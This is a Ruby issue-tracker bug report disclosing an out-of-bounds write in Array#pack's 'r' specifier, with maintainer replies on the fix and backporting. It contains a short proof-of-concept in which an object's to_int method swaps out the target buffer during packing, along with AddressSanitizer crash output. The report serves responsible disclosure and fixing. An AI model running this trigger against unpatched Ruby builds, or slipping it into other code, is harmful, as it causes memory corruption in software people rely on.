Project

General

Profile

Actions

Bug #22337

closed

OOB write in array.pack()

Bug #22337: OOB write in array.pack()

Added by danielchong (Daniel Chong) 2 days ago. Updated about 16 hours ago.

Status:
Closed
Assignee:
-
Target version:
-
[ruby-core:126784]

Description

Hi, I found a case that causes an oob write in array.pack()

PoC:

buf = "Z" * 4096
$buf = buf
evil = Object.new
def evil.to_int
  $buf.replace("q")    
  123456789            
end
[evil].pack("r", buffer: buf)

asan output (truncated):

==ERROR: AddressSanitizer: use-after-poison ... WRITE of size 1
    #0 bary_pack            bignum.c:911
    #1 rb_integer_pack      bignum.c:3673
    #2 pack_pack            pack.c:800            <- write at RSTRING_PTR(res)+stale_start
    #3 vm_opt_newarray_pack_buffer  vm_insnhelper.c:6632
Address ... is a wild pointer inside of access range of size 0x1.

Updated by peterzhu2118 (Peter Zhu) 2 days ago 1Actions #1 [ruby-core:126788]

  • Status changed from Open to Closed
  • Backport changed from 3.3: UNKNOWN, 3.4: UNKNOWN, 4.0: UNKNOWN to 3.3: WONTFIX, 3.4: REQUIRED, 4.0: REQUIRED

Thank you for the bug report, I believe this has already been fixed in this PR. I have marked this for backport.

Updated by nagachika (Tomoyuki Chikanaga) about 16 hours ago Actions #2 [ruby-core:126799]

  • Backport changed from 3.3: WONTFIX, 3.4: REQUIRED, 4.0: REQUIRED to 3.3: WONTFIX, 3.4: DONTNEED, 4.0: DONTNEED

The 'r/R' specifiers are added in 4.1. I suppose we don't have to backport this.

Actions

Also available in: PDF Atom